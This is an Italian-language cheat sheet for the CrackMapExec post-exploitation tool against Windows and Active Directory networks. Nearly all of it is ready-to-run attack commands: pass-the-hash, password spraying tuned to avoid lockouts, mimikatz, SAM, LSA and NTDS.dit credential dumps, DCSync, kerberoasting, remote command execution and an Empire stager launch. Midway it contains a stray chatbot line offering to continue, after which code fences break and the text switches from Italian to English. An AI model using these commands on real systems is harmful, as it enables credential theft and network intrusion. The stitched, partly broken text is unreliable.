Foglio Comandi di CrackMapExec
Panoramica
CrackMapExec (CME) è uno strumento post-sfruttamento progettato per test di penetrazione e operazioni di red team in ambienti Windows/Active Directory. È spesso descritto come un “coltellino svizzero” per i test di penetrazione di rete, che consente l’enumerazione, il test delle credenziali e l’esecuzione di comandi su più protocolli.
⚠️ Avvertenza: CrackMapExec è uno strumento di test di sicurezza che dovrebbe essere utilizzato solo in ambienti per i quali si dispone di autorizzazione esplicita.
Installazione
Utilizzando pipx (Consigliato)
# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath
# Install CrackMapExec
pipx install crackmapexecSu Kali Linux
sudo apt update
sudo apt install -y crackmapexecDa GitHub
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry installUtilizzando Docker
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexecUtilizzo Base
Sintassi Generale
crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]Protocolli Supportati
smb: Server Message Blockwinrm: Windows Remote Managementldap: Lightweight Directory Access Protocolmssql: Microsoft SQL Serverssh: Secure Shellrdp: Remote Desktop Protocolftp: File Transfer Protocol
Specificazione Target
# Single target
crackmapexec smb 192.168.1.100
# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101
# IP range
crackmapexec smb 192.168.1.1-255
# CIDR notation
crackmapexec smb 192.168.1.0/24
# From file
crackmapexec smb targets.txtMetodi di Autenticazione
Nome Utente e Password
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'
# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'
# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'
# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txtPass-the-Hash
# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'
# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'
# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txtAutenticazione Locale
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-authAutenticazione di Dominio
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAINComandi Protocollo SMB
Enumerazione Base
# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares
# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users
# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups
# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txtEsecuzione Comandi
Would you like me to continue with the remaining sections?```bash
Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p ‘Password123’ -x ‘whoami’
Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p ‘Password123’ -X ‘$PSVersionTable’
### File Operations
```bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'
# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt
# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'WinRM Protocol Commands
Basic Enumeration
# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'Command Execution
# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'
# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'LDAP Protocol Commands
Basic Enumeration
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain
# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users
# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups
# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers
# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol
# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trustsAdvanced Enumeration
# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description
# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation
# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate
# Search for ASREP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt
# Search for kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txtMSSQL Protocol Commands
Basic Enumeration
# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'
# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'Command Execution
# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'
# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'Module Usage
Module Management
# List available modules
crackmapexec <protocol> --list-modules
# Get module options
crackmapexec <protocol> -M <module> --options
# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2Common Modules
Mimikatz
# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'
# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'
# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'
# Get DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'Empire
# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=httpPowerView
# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'BloodHound
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=AllLsassy
# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassyEnum_DNS
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dnsGOAD
# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goadAdvanced Techniques
Password Spraying
# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'
# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt
# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10Credential Harvesting
# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam
# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa
# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntdsDatabase Operations
Initialize Database
crackmapexec smb 192.168.1.0/24 --databaseView Database
# List hosts
crackmapexec smb --database -L
# List credentials
crackmapexec smb --database -C
# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1Common Options
| Opzione | Descrizione |
|---|---|
-h, --help | Mostra messaggio di aiuto ed esci |
-t THREADS | Imposta il numero di thread concorrenti (predefinito: 100) |
--timeout TIMEOUT | Imposta timeout per le connessioni (predefinito: 5 secondi) |
--verbose | Attiva output dettagliato |
--debug | Abilita output di debug |
--continue-on-success | Continua i tentativi di autenticazione anche dopo il successo |
--no-bruteforce | Nessun bruteforce, utilizzare solo le credenziali fornite |
--fail-limit LIMIT | Numero di tentativi di accesso falliti prima di rinunciare a un host |
--jitter JITTER | Aggiungi un ritardo casuale tra i tentativi di autenticazione (in secondi) |
--local-auth | Eseguire l’autenticazione utilizzando account locali invece di account di dominio |
-d, --domain DOMAIN | Dominio per l’autenticazione |
--no-output | Non visualizzare l’output |
--output-file FILE | Scrivi l’output su file |
--log | Abilita la registrazione su file (predefinito: ~/.cme/logs/) |
| Opzione | Descrizione |
|---|---|
--shares | Elenca azioni disponibili |
--sessions | Elenca sessioni attive |
--disks | Elenca dischi |
--loggedon-users | Elencare gli utenti connessi |
--users | Elencare utenti di dominio |
--groups | Elencare gruppi di domini |
--local-groups | Elenca gruppi locali |
--pass-pol | Ottieni policy delle password |
--rid-brute [MAX_RID] | Enumerare gli utenti tramite bruteforcing RID |
--sam | Dump degli hash SAM |
--lsa | Dump segreti LSA |
--ntds | Dump NTDS.dit |
--exec-method \\{smbexec,wmiexec,mmcexec,atexec\\} | Metodo per eseguire comandi |
| Opzione | Descrizione |
|---|---|
--users | Elencare utenti di dominio |
--groups | Elencare gruppi di domini |
--computers | Elenco computer di dominio |
--domain | Ottieni informazioni sul dominio |
--pass-pol | Ottieni policy delle password |
--trusts | Ottieni trust di dominio |
--asreproast [OUTFILE] | Ottieni utenti AS-REP roastable |
--kerberoasting [OUTFILE] | Ottieni utenti kerberoastable |
--trusted-for-delegation | Ottenere utenti/computer con delega non vincolata |
--allowed-to-delegate | Ottenere utenti/computer con delega vincolata |
| Opzione | Descrizione |
|---|---|
--port [PORT] | Porta WinRM (predefinita: 5985) |
--ssl | Utilizzare SSL per WinRM |
| Opzione | Descrizione |
|---|---|
--port [PORT] | Porta MSSQL (predefinita: 1433) |
-q QUERY | Esegui query SQL |